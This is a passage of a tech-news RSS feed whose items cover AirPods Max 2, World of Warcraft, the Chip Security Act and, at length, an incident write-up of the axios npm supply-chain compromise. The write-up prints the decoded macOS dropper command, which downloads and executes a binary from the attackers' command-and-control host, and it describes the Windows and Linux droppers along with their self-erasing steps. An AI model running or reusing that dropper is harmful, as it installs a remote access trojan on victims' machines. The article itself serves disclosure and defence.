<p><a target="_blank" class="link rapid-with-clickid" href="https://shopping.yahoo.com/rdlw?merchantId=4130e2f0-a14f-4c5e-bdab-cd52ac7d8e79&amp;siteId=us-engadget&amp;pageId=1p-autolink&amp;contentUuid=7e5cbde1-bb67-4c81-a63f-08992e9b0f4c&amp;featureId=text-link&amp;merchantName=Apple&amp;linkText=The+AirPods+Max+2&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5hcHBsZS5jb20vc2hvcC9idXktYWlycG9kcy9haXJwb2RzLW1heC0yIiwiY29udGVudFV1aWQiOiI3ZTVjYmRlMS1iYjY3LTRjODEtYTYzZi0wODk5MmU5YjBmNGMiLCJvcmlnaW5hbFVybCI6Imh0dHBzOi8vd3d3LmFwcGxlLmNvbS9zaG9wL2J1eS1haXJwb2RzL2FpcnBvZHMtbWF4LTIifQ&amp;signature=AQAAAf4Tszc2oL327RAJpeudzK4d4DuHsQjOh0M4JIHf4dYa&amp;gcReferrer=https%3A%2F%2Fwww.apple.com%2Fshop%2Fbuy-airpods%2Fairpods-max-2" data-i13n="elm:affiliate_link;sellerN:Apple;elmt:;cpos:16;pos:1" data-original-link="https://www.apple.com/shop/buy-airpods/airpods-max-2">The AirPods Max 2</a> is an obvious upgrade over the previous version. And no, I don’t count the USB-C swap-in as a separate model. Simply put, the H2 chip brings Apple’s over-ear headphones on par with the rest of the AirPods lineup, namely the AirPods Pro 3. And since I don’t expect Apple to announce new earbuds this year, that parity should remain for a while. </p>
<p>These headphones are still expensive though, and the more affordable AirPods Pro offer handy hearing health features that are nice to have in your pocket. I could also understand why prospective buyers would want some design changes before making such a big investment. Sure, the AirPods Max 2 looks the same as its predecessor, possibly leaving those who own the previous version with a difficult decision to make. But Apple kept the price the same and brought better sound and more features, so there’s no denying these headphones outperform the original.</p>This article originally appeared on Engadget at https://www.engadget.com/audio/headphones/apple-airpods-max-2-review-better-late-than-never-130000982.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Ahead of it's 25% price jump, it looks like Amazon has sold out of the white PlayStation Portal — but the midnight black version is still in stock]]></title>
<description><![CDATA[The PS5 is our pick for the best gaming console of this generation but time is running out to pick it up ahead of another price hike]]></description>
<link>https://tsecurity.de/de/3395878/it-nachrichten/ahead-of-its-25-price-jump-it-looks-like-amazon-has-sold-out-of-the-white-playstation-portal-but-the-midnight-black-version-is-still-in-stock/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3395878/it-nachrichten/ahead-of-its-25-price-jump-it-looks-like-amazon-has-sold-out-of-the-white-playstation-portal-but-the-midnight-black-version-is-still-in-stock/</guid>
<pubDate>Tue, 31 Mar 2026 13:31:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The PS5 is our pick for the best gaming console of this generation but time is running out to pick it up ahead of another price hike]]></content:encoded>
</item>
<item>
<title><![CDATA[The Axios npm Compromise: How the Internet’s Most Popular HTTP Client Became a Trojan Horse]]></title>
<description><![CDATA[A hijacked maintainer account. A phantom dependency. A self-erasing Remote Access Trojan. If you ran npm install on March 31, 2026, your infrastructure might already be compromised.The axios npm compromise marks one of the most operationally sophisticated supply chain attacks in the JavaScript ec...]]></description>
<link>https://tsecurity.de/de/3395131/hacking/the-axios-npm-compromise-how-the-internets-most-popular-http-client-became-a-trojan-horse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3395131/hacking/the-axios-npm-compromise-how-the-internets-most-popular-http-client-became-a-trojan-horse/</guid>
<pubDate>Tue, 31 Mar 2026 08:52:01 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><strong>A hijacked maintainer account. A phantom dependency. A self-erasing Remote Access Trojan. If you ran npm install on March 31, 2026, your infrastructure might already be compromised.</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xmzZs5rgEgs3cvz99br6Jw.png"><figcaption><em>The axios npm compromise marks one of the most operationally sophisticated supply chain attacks in the JavaScript ecosystem, successfully delivering a self-erasing Remote Access Trojan (RAT) to thousands of developers.</em></figcaption></figure><p>If you build software in JavaScript, you use axios. With over 300 million weekly downloads, it is the backbone of API requests for everything from React frontends to enterprise Node.js microservices.</p><p>But on March 31, 2026, axios became the delivery mechanism for one of the most operationally sophisticated supply chain attacks the npm ecosystem has ever seen.</p><p>Threat actors hijacked the account of a lead axios maintainer, bypassed GitHub Actions security protocols, and published two poisoned versions (1.14.1 and 0.30.4). The payload? A stealthy, cross-platform Remote Access Trojan (RAT) that infects macOS, Windows, and Linux systems — and then completely erases its own tracks.</p><p>Here is the full technical breakdown of how the attackers pulled it off, the terrifying “self-destruct” mechanism they used to hide the evidence, and exactly what you need to do to secure your codebase.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*A9XyY9JWibD7XS8icApRxg.png"><figcaption><em>By utilizing a “Phantom Dependency,” the attackers ensured that developers didn’t actually have to use the malicious crypto library in their code. Merely downloading axios via npm install was enough to trigger the payload.</em></figcaption></figure><h3>The Anatomy of the Attack: A Pre-Meditated Strike</h3><p>This was not a smash-and-grab script kiddie operation. The attack was meticulously staged over 18 hours to evade automated security scanners.</p><p><strong>Step 1: Staging the Decoy</strong><br>On March 30, the attackers created a throwaway npm account (nrwise@proton.me) and published a package called plain-crypto-js@4.2.0. This version was completely clean. It was a 1:1 clone of the legitimate crypto-js library. The goal? To build a few hours of “safe” publishing history so security scanners wouldn’t immediately flag a brand-new package.</p><p><strong>Step 2: Arming the Payload</strong><br>Just before midnight UTC, the attackers pushed plain-crypto-js@4.2.1. This version contained a hidden postinstall hook (node setup.js) armed with heavily obfuscated malware.</p><p><strong>Step 3: Hijacking Axios</strong><br>Less than 30 minutes later, the attackers compromised the legitimate jasonsaayman npm account (a core axios maintainer). The attacker changed the account email to an anonymous ProtonMail address and generated a classic, long-lived npm access token. By doing this, they bypassed the cryptographically secure GitHub Actions OIDC pipeline normally used to publish axios.</p><p>The forensic proof lies in the npm registry metadata. Legitimate axios 1.x releases are published using GitHub Actions with npm’s OIDC Trusted Publisher mechanism. But look at the metadata for the compromised 1.14.1 version — the OIDC binding is completely missing, indicating a manual publish via a stolen, long-lived access token:</p><pre>// axios@1.14.0 — LEGITIMATE<br>"_npmUser": {<br>  "name": "GitHub Actions",<br>  "email": "npm-oidc-no-reply@github.com",<br>  "trustedPublisher": {<br>    "id": "github",<br>    "oidcConfigId": "oidc:9061ef30-3132-49f4-b28c-9338d192a1a9"<br>  }<br>}<br>// axios@1.14.1 - MALICIOUS<br>"_npmUser": {<br>  "name": "jasonsaayman",<br>  "email": "ifstap@proton.me"<br>  // Notice: No trustedPublisher, no gitHead, no GitHub commit<br>}</pre><p>They published axios@1.14.1 and axios@0.30.4, injecting plain-crypto-js@4.2.1 into the dependency tree.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YrYsfEy_o1TXUBTMpcqcwQ.png"><figcaption><em>The attackers premeditated the strike by establishing a clean publishing history with a decoy package 18 hours before injecting the malware into the legitimate axios release pipelines.</em></figcaption></figure><h3>The Phantom Dependency</h3><p>If you inspect the source code of the compromised axios releases, you won’t find a single line of malicious code.</p><p>The attackers utilized a “Phantom Dependency” tactic. plain-crypto-js is added to the package.json file, but it is <em>never</em> imported or require()’d anywhere in the axios codebase.</p><p>Because it is in the manifest, npm automatically downloads it and runs its postinstall script the moment a developer types npm install. The developer doesn’t have to actually use the crypto library; merely downloading axios triggers the malware.</p><h3>A Triple-Threat: Mac, Windows, and Linux</h3><p>Once triggered, the heavily obfuscated setup.js script detects the host operating system and deploys a platform-specific Remote Access Trojan (RAT), pinging a Command &amp; Control (C2) server located at sfrclak.com:8000.</p><ul><li><strong>macOS (darwin):</strong> Silently runs an AppleScript to download a binary, hides it in /Library/Caches/com.apple.act.mond (disguising it as an “Activity Monitor Daemon”), and executes it via ZSH.</li><li><strong>Windows (win32):</strong> Copies PowerShell, disguises it as Windows Terminal (wt.exe), and uses a hidden VBScript to download and run a malicious .ps1 script bypassing execution policies.</li><li><strong>Linux:</strong> Executes a direct shell command to download a Python RAT to /tmp/ld.py and runs it as a detached background process using nohup.</li></ul><p>To understand how stealthy this is, here is the fully decoded macOS AppleScript dropper extracted from the malware. Notice how it deliberately downloads the binary into a system cache folder and names it com.apple.act.mond to disguise it as an Apple Activity Monitor Daemon:</p><pre>do shell script "curl -o /Library/Caches/com.apple.act.mond \<br>  -d packages.npm.org/product0 \<br>  -s http://sfrclak.com:8000/6202033 \<br>  &amp;&amp; chmod 770 /Library/Caches/com.apple.act.mond \<br>  &amp;&amp; /bin/zsh -c \"/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &amp;\" \<br>  &amp;&gt; /dev/null"</pre><h3>The Ultimate Cover-Up: Self-Destructing Evidence</h3><p>The most terrifying part of this malware is its forensic hygiene. It is designed to ghost your system immediately after infecting it.</p><p>Once the platform-specific RAT is safely running in the background, setup.js executes three final commands:</p><ul><li>It deletes setup.js from your drive.</li><li>It deletes its own package.json (destroying the evidence of the malicious postinstall hook).</li><li>It renames a pre-staged package.md file to package.json. This fake file makes the package look like the clean, benign 4.2.0 version.</li></ul><p>If an incident responder looks into the node_modules folder after the infection, everything appears perfectly normal.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ELwwtL4HEO4wGxhtBywJkQ.png"><figcaption><em>Forensic Evasion: The malware actively detaches itself from the npm install process tree (orphaning itself to PID 1) and then deletes its own source files, making post-infection detection incredibly difficult.</em></figcaption></figure><h3>Am I Affected? (And How to Fix It)</h3><p>If you have installed axios@1.14.1 or axios@0.30.4, <strong>assume your system is compromised.</strong> Because the malware deletes its own tracks, standard vulnerability scanners might not flag the directory accurately.</p><p><strong>How to check:</strong><br>Run this command in your terminal to check for the compromised versions:</p><pre>npm list axios 2&gt;/dev/null | grep -E "1\.14\.1|0\.30\.4"</pre><p>Check your filesystem for the lingering RAT artifacts:</p><ul><li><strong>Mac:</strong> ls -la /Library/Caches/com.apple.act.mond</li><li><strong>Linux:</strong> ls -la /tmp/ld.py</li><li><strong>Windows:</strong> dir “%PROGRAMDATA%\wt.exe”</li></ul><p><strong>Immediate Remediation Steps:</strong></p><ul><li><strong>Downgrade and Pin:</strong> Immediately downgrade your package to the clean versions: npm install axios@1.14.0 (for 1.x users) or axios@0.30.3 (for 0.x users). Use the overrides or resolutions block in your package.json to prevent transitive dependency resolution back to the infected versions.</li><li><strong>Rotate Everything:</strong> Rotate all credentials on any machine that ran the install. This includes AWS access keys, SSH private keys, cloud credentials, and anything in a .env file.</li><li><strong>Nuke and Pave:</strong> If you find the RAT artifact on a machine, do not attempt to clean it. Rebuild the machine from a known-good state.</li><li><strong>Locking down your package.json:</strong><br>To guarantee that npm does not transitively resolve back to the infected versions through other packages, add an overrides (for npm) or resolutions (for Yarn) block to your package.json locking axios to the safe 1.14.0 version:</li></ul><pre>{<br>  "dependencies": { <br>    "axios": "1.14.0" <br>  },<br>  "overrides": { <br>    "axios": "1.14.0" <br>  },<br>  "resolutions": { <br>    "axios": "1.14.0" <br>  }<br>}</pre><p><em>(Note: If you are on the legacy 0.x branch, replace 1.14.0 with 0.30.3).</em></p><p>Moving forward, developers and CI/CD engineers should consider using npm ci — ignore-scripts as a standing policy to prevent postinstall hooks from running arbitrary code during automated builds.</p><p>In a world where 300 million downloads can be poisoned by a single stolen access token, blind trust in the registry is no longer an option.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=c80c6f73f52d" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/the-axios-npm-compromise-how-the-internets-most-popular-http-client-became-a-trojan-horse-c80c6f73f52d">The Axios npm Compromise: How the Internet’s Most Popular HTTP Client Became a Trojan Horse</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Xbox’s next original game is taking shape as the studio behind South of Midnight begins hiring for a mysterious new project]]></title>
<description><![CDATA[Compulsion Games is hiring across multiple roles as it begins work on a new IP described as intriguing, according to a recent LinkedIn post from the studio.]]></description>
<link>https://tsecurity.de/de/3390868/windows-tipps/xboxs-next-original-game-is-taking-shape-as-the-studio-behind-south-of-midnight-begins-hiring-for-a-mysterious-new-project/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3390868/windows-tipps/xboxs-next-original-game-is-taking-shape-as-the-studio-behind-south-of-midnight-begins-hiring-for-a-mysterious-new-project/</guid>
<pubDate>Sun, 29 Mar 2026 15:01:19 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Compulsion Games is hiring across multiple roles as it begins work on a new IP described as intriguing, according to a recent LinkedIn post from the studio.]]></content:encoded>
</item>
<item>
<title><![CDATA[New AirPods Max 2 drop to $529 with this weekend's best preorder deal]]></title>
<description><![CDATA[Despite preorders selling out at other retailers, AirPods Max 2 are on sale now at Walmart, with a $20 weekend discount and a preorder price guarantee.AirPods Max 2 are on sale now with a preorder price guarantee - Image credit: ApplePick up Apple's new over-ear headphones in Midnight for $529 at...]]></description>
<link>https://tsecurity.de/de/3387363/ios-mac-os/new-airpods-max-2-drop-to-529-with-this-weekends-best-preorder-deal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3387363/ios-mac-os/new-airpods-max-2-drop-to-529-with-this-weekends-best-preorder-deal/</guid>
<pubDate>Fri, 27 Mar 2026 18:53:43 +0100</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Despite preorders selling out at other retailers, AirPods Max 2 are on sale now at Walmart, with a $20 weekend discount and a preorder price guarantee.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67169-141242-new-airpods-max-2-sale-xl.jpg" alt="AirPods Max 2 over-ear headphones centered on a neon purple grid background with bold white text reading AIRPODS MAX 2 SALE and angled purple arrows pointing toward the headphones"><br><span>AirPods Max 2 are on sale now with a preorder price guarantee - Image credit: Apple</span></div><br>Pick up Apple's new over-ear headphones in Midnight <strong><a href="https://howl.link/2un83l0lqiask" rel="nofollow" target="_blank">for $529 at Walmart</a></strong>, a $20 discount off MSRP. With retailers like Amazon showing a "currently unavailable" message on <a href="https://www.amazon.com/dp/B0GSS72GZJ?tag=apinsiderdeals-20" rel="nofollow" target="_blank">its product page</a>, ordering from Walmart allows you to snap up the lowest price on the 2026 release while securing a preorder price guarantee ahead of the early April launch.<br><br><a href="https://howl.link/2un83l0lqiask" rel="nofollow" class="deal-highlight">Save $20 on AirPods Max 2</a><br><br><br> <a href="https://appleinsider.com/articles/26/03/27/new-airpods-max-2-drop-to-529-with-this-weekends-best-preorder-deal?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/243858?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Congress Wants a GPS Tracker on Every Advanced AI Chip America Exports]]></title>
<description><![CDATA[DeepSeek changed the calculation. When the House Select Committee on China concluded in early 2025 that the Chinese AI company had trained its flagship model on restricted Nvidia AI chips that should never have reached it, Congress stopped treating chip smuggling as an enforcement failure and sta...]]></description>
<link>https://tsecurity.de/de/3386182/it-security-nachrichten/congress-wants-a-gps-tracker-on-every-advanced-ai-chip-america-exports/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3386182/it-security-nachrichten/congress-wants-a-gps-tracker-on-every-advanced-ai-chip-america-exports/</guid>
<pubDate>Fri, 27 Mar 2026 12:14:01 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="800" height="533" src="https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="AI Chip, Chip Security Act" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi.webp 800w, https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi.webp 800w, https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/AI-Chip_Chip-Securi-750x500.webp 750w" sizes="(max-width: 800px) 100vw, 800px" title="Congress Wants a GPS Tracker on Every Advanced AI Chip America Exports 1"></p>DeepSeek changed the calculation. When the House Select Committee on China concluded in early 2025 that the Chinese AI company had trained its flagship model on restricted Nvidia AI chips that should never have reached it, Congress stopped treating chip smuggling as an enforcement failure and started treating it as a legislative emergency — one that arrived on the House Foreign Affairs Committee's desk, this week.

The House Foreign Affairs Committee passed the Chip Security Act with bipartisan support on Thursday, advancing legislation to curb the smuggling of American semiconductors to foreign adversaries. The bill was introduced in May 2025 as a direct response to concerns raised by the Select Committee on China in its report on DeepSeek, which concluded the company used advanced Nvidia chips restricted from export to China to develop its AI model.
<h3><strong>Here's What the AI Chip Security Act Is</strong></h3>
The core mechanism the Chip <a class="wpil_keyword_link" title="Security" href="https://thecyberexpress.com/" data-wpil-keyword-link="linked" data-wpil-monitor-id="27327">Security</a> Act puts forward is location verification — the requirement that advanced AI chips exported from the United States carry a technical security mechanism, whether implemented in software, firmware, or hardware, that continuously confirms where the device physically sits.

The bill requires the Secretary of Commerce to mandate, within 180 days of enactment, that any covered integrated circuit product be outfitted with chip security mechanisms implementing location verification before it is exported, reexported, or transferred to a foreign country. Covered products include chips classified under Export Control Classification Numbers 3A090, 3A001.z, 4A090, and 4A003.z — the precise classifications that cover Nvidia's H100 and equivalent advanced AI accelerators.

The <a href="https://www.congress.gov/bill/119th-congress/house-bill/3447/text" target="_blank" rel="nofollow noopener">bill</a> also requires any person who received a license to export a covered chip to promptly report to the Under Secretary of Industry and Security if they obtain credible information that the product has been diverted to an unauthorized end-user or location. Mandatory reporting closes a gap that currently allows diversion to go unreported until investigators stumble across it independently — sometimes years after the fact.

The bill arrives with enforcement urgency already established on its behalf. Earlier this week, the Justice Department charged three individuals for conspiring to smuggle billions of dollars' worth of advanced AI chips to China through Thailand.
<h5>Read: <a href="https://thecyberexpress.com/charged-for-smuggling-america-made-ai-tech/">Three Individuals Charged for Trying to Smuggle ‘America-Made’ AI Tech Worth $170M</a></h5>
In November 2025, the DOJ had also indicted three Chinese nationals for smuggling high-tech chips through Thailand and Malaysia to China. Both cases used the trans-shipment model — routing restricted chips through a third country to obscure China as the final destination — demonstrating that existing export controls fail at the physical enforcement layer precisely where location verification would apply.

The broader legislative push sits in deliberate tension with the Trump administration. The White House AI czar, David Sacks, in January retweeted criticism of the Chip Security Act, suggesting it handicaps Trump's ability to strategically position the U.S. favorably against China. House Foreign Affairs Committee Chairman Brian Mast pushed back directly, saying the talking points amplified by Sacks matched those he had heard from Nvidia. Nvidia CEO Jensen Huang has repeatedly argued to lawmakers that U.S. chip sales to China entrench American technology as the global standard — a position congressional China hawks view as commercially motivated reasoning that ignores military end-use <a class="wpil_keyword_link" title="risk" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" data-wpil-keyword-link="linked" data-wpil-monitor-id="27328">risk</a>.

The Trump administration <a href="https://www.reuters.com/world/asia-pacific/us-eases-regulations-nvidia-h200-chip-exports-china-2026-01-13/" target="_blank" rel="nofollow noopener">approved</a> the export of higher-tier H200 chips to China in January 2026, walking back the previous administration's blanket restrictions. That decision prompted fierce backlash on Capitol Hill, where lawmakers have been seeking congressional control over export licensing — authority that currently belongs entirely to the Department of Commerce.

The Chip Security Act represents Congress's attempt to build a verification infrastructure capable of surviving executive policy oscillations by embedding accountability into the hardware itself rather than relying solely on licensing decisions made at the administrative level.

Industry groups including the Information Technology and Innovation Council have warned that a government chip-tracking mandate creates the impression of deepening U.S. government control over the American AI stack, potentially pushing countries that should be core customers toward alternative suppliers. Whether that concern outweighs the demonstrated reality of $170 million AI chip smuggling conspiracies routed through Southeast Asian shell companies is now a question for the full House floor.]]></content:encoded>
</item>
<item>
<title><![CDATA[AirPods Max 2 Pre-orders Are Finally Open with April 1 Delivery Date]]></title>
<description><![CDATA[If you have been waiting to upgrade your premium headphones, Apple just gave you the green light. The company officially opened pre-orders for its highly anticipated AirPods Max 2 this morning. You do not have to wait very long to get your hands on a pair, either. Early buyers who secure their or...]]></description>
<link>https://tsecurity.de/de/3380980/ios-mac-os/airpods-max-2-pre-orders-are-finally-open-with-april-1-delivery-date/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3380980/ios-mac-os/airpods-max-2-pre-orders-are-finally-open-with-april-1-delivery-date/</guid>
<pubDate>Wed, 25 Mar 2026 17:37:57 +0100</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If you have been waiting to upgrade your premium headphones, Apple just gave you the green light. The company officially opened pre-orders for its highly anticipated AirPods Max 2 this morning. You do not have to wait very long to get your hands on a pair, either. Early buyers who secure their orders today can expect deliveries to start arriving as soon as April 1.



Here are the upgrades of the new premium headphones



The updated model brings a few welcome changes that fans have requested for years. Breaking these features down makes it easy to see what is new:




Universal charging: Apple swapped out the old Lightning connection, so its newest headset finally uses the USB-C standard. You can now power up the headphones using the same cable you already use for a modern iPad or Mac.



Better audio hardware: The device features the newer H2 processor. This makes active noise cancellation noticeably stronger while giving battery life a nice boost.



Fresh colors: While the physical aluminum design looks mostly identical to the original version, the brand introduced several new options. You can now pick from updated shades like midnight, starlight, and a muted purple.




Where to secure your pre-order today



You can buy the headphones directly through the official Apple online store or check major retail partners like Amazon and Best Buy. The standard retail price is set at exactly $549, which matches the cost of the original version.



While it is rare to see massive discounts on launch day, some third-party sellers are offering some deals if you use specific store credit cards. Trading in an older device directly to the company can also help bring that initial cost down.



Since initial stock tends to sell out fast for new Apple audio gear, putting your order in early is the smartest way to make sure it ships by the first week of April. If you wait too long to decide, shipping estimates will likely slip into late April as supply runs low.]]></content:encoded>
</item>
<item>
<title><![CDATA['AI will also present new threats to society' — Sam Altman issues stark warning as $1 billion plan is revealed]]></title>
<description><![CDATA[Sam Altman says AI could help cure diseases — but warns it will also create serious new threats that no single company can control.]]></description>
<link>https://tsecurity.de/de/3380375/it-nachrichten/ai-will-also-present-new-threats-to-society-sam-altman-issues-stark-warning-as-1-billion-plan-is-revealed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3380375/it-nachrichten/ai-will-also-present-new-threats-to-society-sam-altman-issues-stark-warning-as-1-billion-plan-is-revealed/</guid>
<pubDate>Wed, 25 Mar 2026 15:01:51 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sam Altman says AI could help cure diseases — but warns it will also create serious new threats that no single company can control.]]></content:encoded>
</item>
<item>
<title><![CDATA[WoW: Hacker-Gilde macht RWF erneut lächerlich - schnappt sich World First - Buffed]]></title>
<description><![CDATA[Der World-First-Kill über Chimaerus Mythisch in WoW: Midnight ging überraschend nicht an eine der Top-Gilden. Wieder hatten Hacker ihre Finger im ...]]></description>
<link>https://tsecurity.de/de/3379784/hacking/wow-hacker-gilde-macht-rwf-erneut-laecherlich-schnappt-sich-world-first-buffed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3379784/hacking/wow-hacker-gilde-macht-rwf-erneut-laecherlich-schnappt-sich-world-first-buffed/</guid>
<pubDate>Wed, 25 Mar 2026 12:27:49 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der World-First-Kill über Chimaerus Mythisch in WoW: Midnight ging überraschend nicht an eine der Top-Gilden. Wieder hatten <b>Hacker</b> ihre Finger im ...]]></content:encoded>
</item>
<item>
<title><![CDATA[For All Mankind Renewed for Sixth and Final Season on Apple TV+]]></title>
<description><![CDATA[Apple is giving its long-running space drama a proper ending. The network just announced that "For All Mankind" will return for a sixth and final season. This decision allows the writers to wrap up the alternate history timeline exactly how they planned without rushing the story. Fans do not have...]]></description>
<link>https://tsecurity.de/de/3377875/ios-mac-os/for-all-mankind-renewed-for-sixth-and-final-season-on-apple-tv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3377875/ios-mac-os/for-all-mankind-renewed-for-sixth-and-final-season-on-apple-tv/</guid>
<pubDate>Tue, 24 Mar 2026 19:53:27 +0100</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple is giving its long-running space drama a proper ending. The network just announced that "For All Mankind" will return for a sixth and final season. This decision allows the writers to wrap up the alternate history timeline exactly how they planned without rushing the story. Fans do not have to wait long for new episodes either, because the fifth season is set to premiere on March 27.



The show is shifting the focus from survival to politics



The upcoming fifth season jumps forward into the 2010s. The Mars colony at Happy Valley has grown into a massive society with thousands of people living there. The story moves past the basic struggle of surviving on a dead planet. Now, the tension centers around who gets to make the rules.



Earth governments want to control the colony, while the people actually living on Mars have their own ideas about how things should run. This friction sets the stage perfectly for the final run of episodes.



There’s a new show on the way to expand the universe



Even though the main series is ending, Apple wants to keep this television universe alive. The creators have a companion series called "Star City" ready to launch on May 29. This spinoff will air on the same day the fifth season finishes its weekly run.



Building a new show gives the network a way to keep fans engaged with the alternate space race without stretching the original story past its natural endpoint.]]></content:encoded>
</item>
<item>
<title><![CDATA[World of Warcraft: Midnight review — This dark middle act has immense ambition, but Blizzard is spreading itself thin at the cost of quality]]></title>
<description><![CDATA[The high bar Blizzard has set itself has given us more "stuff" to do in WoW than ever, but there's a variety of quality issues that are compounding into frustration.]]></description>
<link>https://tsecurity.de/de/3376636/windows-tipps/world-of-warcraft-midnight-review-this-dark-middle-act-has-immense-ambition-but-blizzard-is-spreading-itself-thin-at-the-cost-of-quality/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3376636/windows-tipps/world-of-warcraft-midnight-review-this-dark-middle-act-has-immense-ambition-but-blizzard-is-spreading-itself-thin-at-the-cost-of-quality/</guid>
<pubDate>Tue, 24 Mar 2026 13:55:42 +0100</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The high bar Blizzard has set itself has given us more "stuff" to do in WoW than ever, but there's a variety of quality issues that are compounding into frustration.]]></content:encoded>
</item>
<item>
<title><![CDATA[Secretlab has discounted its World of Warcraft collab gear to celebrate the Midnight launch]]></title>
<description><![CDATA[Gaming furniture brand Secretlab has slashed the price of some of its World of Warcraft collab gear.]]></description>
<link>https://tsecurity.de/de/3376394/it-nachrichten/secretlab-has-discounted-its-world-of-warcraft-collab-gear-to-celebrate-the-midnight-launch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3376394/it-nachrichten/secretlab-has-discounted-its-world-of-warcraft-collab-gear-to-celebrate-the-midnight-launch/</guid>
<pubDate>Tue, 24 Mar 2026 13:01:42 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Gaming furniture brand Secretlab has slashed the price of some of its World of Warcraft collab gear.]]></content:encoded>
</item>
<item>
<title><![CDATA[Save desk space while saving the World of Warcraft with this MMO mouse and gaming keyboard — both nearly 40% off]]></title>
<description><![CDATA[Two of Razer's best mid-range PC gaming accessories are on sale for Amazon's Spring Sale, just in time for World of Warcraft: Midnight's first Season.]]></description>
<link>https://tsecurity.de/de/3374453/windows-tipps/save-desk-space-while-saving-the-world-of-warcraft-with-this-mmo-mouse-and-gaming-keyboard-both-nearly-40-off/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3374453/windows-tipps/save-desk-space-while-saving-the-world-of-warcraft-with-this-mmo-mouse-and-gaming-keyboard-both-nearly-40-off/</guid>
<pubDate>Mon, 23 Mar 2026 18:38:30 +0100</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Two of Razer's best mid-range PC gaming accessories are on sale for Amazon's Spring Sale, just in time for World of Warcraft: Midnight's first Season.]]></content:encoded>
</item>
<item>
<title><![CDATA[MIRI’s 2025 Fundraiser]]></title>
<description><![CDATA[Update: Our fundraiser has concluded. Many thanks to all our generous supporters for helping us raise just over $1.6M and secure all available matching funds! MIRI is running its first fundraiser in six years, targeting $6M. The first $1.6M raised will be matched 1:1 via an SFF grant. Fundraiser ...]]></description>
<link>https://tsecurity.de/de/3365219/ai-nachrichten/miris-2025-fundraiser/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3365219/ai-nachrichten/miris-2025-fundraiser/</guid>
<pubDate>Fri, 20 Mar 2026 04:29:21 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
